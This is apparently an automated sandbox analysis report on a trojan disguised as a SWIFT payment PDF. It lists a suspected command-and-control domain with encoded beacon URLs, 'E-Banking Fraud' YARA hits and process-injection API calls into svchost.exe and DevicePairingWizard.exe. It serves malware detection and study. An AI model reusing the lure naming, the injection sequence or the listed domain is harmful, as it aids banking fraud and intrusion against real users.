                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Cabinets.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXu
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Design_Ideas.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAI
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Remodeling_Tips.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8up
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/Kitchen_Products.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXuJ
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/Kitchen_Remodeling.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhX
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/__media__/design/underconstructionnotice.php?d=rimberiokitchen.onl
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/__media__/js/trademark.php?d=rimberiokitchen.online&type=ns
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/px.js?ch=1
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/px.js?ch=2
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/sk-logabpstatus.php?a=L1N3WXcvTG4rbTFUeWgzcExCUXZVOTUzaFVabnBmQkpi
                Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rimberiokitchen.online/sk-logabpstatus.php?a=TEdQajRwbU5mNWR3d0VHeGk1WjViUVdIYjZ3dUM5K0NC
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: c104-9J-L.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: c104-9J-L.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.0000000000828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: DevicePairingWizard.exe, 0000000C.00000003.1621095255.000000000775D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000620C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000006530000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.00000000066C2000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000005022000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004E90000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004B6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: c104-9J-L.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000005EE8000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004848000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                Source: initial sampleStatic PE information: Filename: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0054C9B3 NtClose,2_2_0054C9B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005217D5 NtProtectVirtualMemory,2_2_005217D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032734E0 NtCreateMutant,LdrInitializeThunk,2_2_032734E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272A80 NtClose,LdrInitializeThunk,2_2_03272A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274260 NtSetContextThread,2_2_03274260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274570 NtSuspendThread,2_2_03274570
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B20 NtQueryInformationProcess,2_2_03272B20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B00 NtQueryValueKey,2_2_03272B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B10 NtAllocateVirtualMemory,2_2_03272B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtCreateKey,2_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B90 NtFreeVirtualMemory,2_2_03272B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryVirtualMemory,2_2_03272BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BC0 NtQueryInformationToken,2_2_03272BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272A10 NtWriteFile,2_2_03272A10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AA0 NtQueryInformationFile,2_2_03272AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AC0 NtEnumerateValueKey,2_2_03272AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032729F0 NtReadFile,2_2_032729F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032729D0 NtWaitForSingleObject,2_2_032729D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032738D0 NtGetContextThread,2_2_032738D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtOpenDirectoryObject,2_2_03272F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F00 NtCreateFile,2_2_03272F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtSetValueKey,2_2_03272FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E00 NtQueueApcThread,2_2_03272E00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E50 NtCreateSection,2_2_03272E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EB0 NtProtectVirtualMemory,2_2_03272EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtCreateProcessEx,2_2_03272E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EC0 NtQuerySection,2_2_03272EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272ED0 NtResumeThread,2_2_03272ED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D50 NtWriteVirtualMemory,2_2_03272D50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DA0 NtReadVirtualMemory,2_2_03272DA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DC0 NtAdjustPrivilegesToken,2_2_03272DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C20 NtSetInformationFile,2_2_03272C20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C30 NtMapViewOfSection,2_2_03272C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273C30 NtOpenProcessToken,2_2_03273C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C10 NtOpenProcess,2_2_03272C10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C50 NtUnmapViewOfSection,2_2_03272C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273C90 NtOpenThread,2_2_03273C90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtDelayExecution,2_2_03272CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CD0 NtEnumerateKey,2_2_03272CD0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04594570 NtSuspendThread,LdrInitializeThunk,12_2_04594570
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04594260 NtSetContextThread,LdrInitializeThunk,12_2_04594260
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592C50 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04592C50
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592C30 NtMapViewOfSection,LdrInitializeThunk,12_2_04592C30
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592CF0 NtDelayExecution,LdrInitializeThunk,12_2_04592CF0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592D10 NtQuerySystemInformation,LdrInitializeThunk,12_2_04592D10
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592DA0 NtReadVirtualMemory,LdrInitializeThunk,12_2_04592DA0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592E50 NtCreateSection,LdrInitializeThunk,12_2_04592E50
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592E00 NtQueueApcThread,LdrInitializeThunk,12_2_04592E00
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592ED0 NtResumeThread,LdrInitializeThunk,12_2_04592ED0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592F00 NtCreateFile,LdrInitializeThunk,12_2_04592F00
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045929F0 NtReadFile,LdrInitializeThunk,12_2_045929F0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592A10 NtWriteFile,LdrInitializeThunk,12_2_04592A10
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592AC0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04592AC0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592A80 NtClose,LdrInitializeThunk,12_2_04592A80
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592B10 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04592B10
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592B00 NtQueryValueKey,LdrInitializeThunk,12_2_04592B00
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592BC0 NtQueryInformationToken,LdrInitializeThunk,12_2_04592BC0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592B90 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04592B90
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592B80 NtCreateKey,LdrInitializeThunk,12_2_04592B80
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045934E0 NtCreateMutant,LdrInitializeThunk,12_2_045934E0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045938D0 NtGetContextThread,LdrInitializeThunk,12_2_045938D0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592C10 NtOpenProcess,12_2_04592C10
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592C20 NtSetInformationFile,12_2_04592C20
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592CD0 NtEnumerateKey,12_2_04592CD0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592D50 NtWriteVirtualMemory,12_2_04592D50
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592DC0 NtAdjustPrivilegesToken,12_2_04592DC0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592EC0 NtQuerySection,12_2_04592EC0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592E80 NtCreateProcessEx,12_2_04592E80
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592EB0 NtProtectVirtualMemory,12_2_04592EB0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592F30 NtOpenDirectoryObject,12_2_04592F30
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592FB0 NtSetValueKey,12_2_04592FB0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045929D0 NtWaitForSingleObject,12_2_045929D0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592AA0 NtQueryInformationFile,12_2_04592AA0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592B20 NtQueryInformationProcess,12_2_04592B20
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04592BE0 NtQueryVirtualMemory,12_2_04592BE0
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04593C30 NtOpenProcessToken,12_2_04593C30
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_04593C90 NtOpenThread,12_2_04593C90
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441EFCA NtQueryInformationProcess,NtReadVirtualMemory,12_2_0441EFCA
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441EFD8 NtQueryInformationProcess,12_2_0441EFD8
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441FB78 NtSetContextThread,NtResumeThread,12_2_0441FB78
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441FB2D NtSetContextThread,12_2_0441FB2D
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00431BE8: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004096A00_2_004096A0
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042200C0_2_0042200C
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0041A2170_2_0041A217
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004122160_2_00412216
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042435D0_2_0042435D
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004033C00_2_004033C0
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044F4300_2_0044F430
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004125E80_2_004125E8
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044663B0_2_0044663B
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004138010_2_00413801
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042096F0_2_0042096F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004129D00_2_004129D0
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004119E30_2_004119E3
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040FA100_2_0040FA10
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00423C810_2_00423C81
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00411E780_2_00411E78
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00442E0C0_2_00442E0C
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00420EC00_2_00420EC0
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044CF170_2_0044CF17
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00444FD20_2_00444FD2
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_041236580_2_04123658
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005389532_2_00538953
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005217D52_2_005217D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0054F0132_2_0054F013
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005231202_2_00523120
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005301FB2_2_005301FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005302032_2_00530203
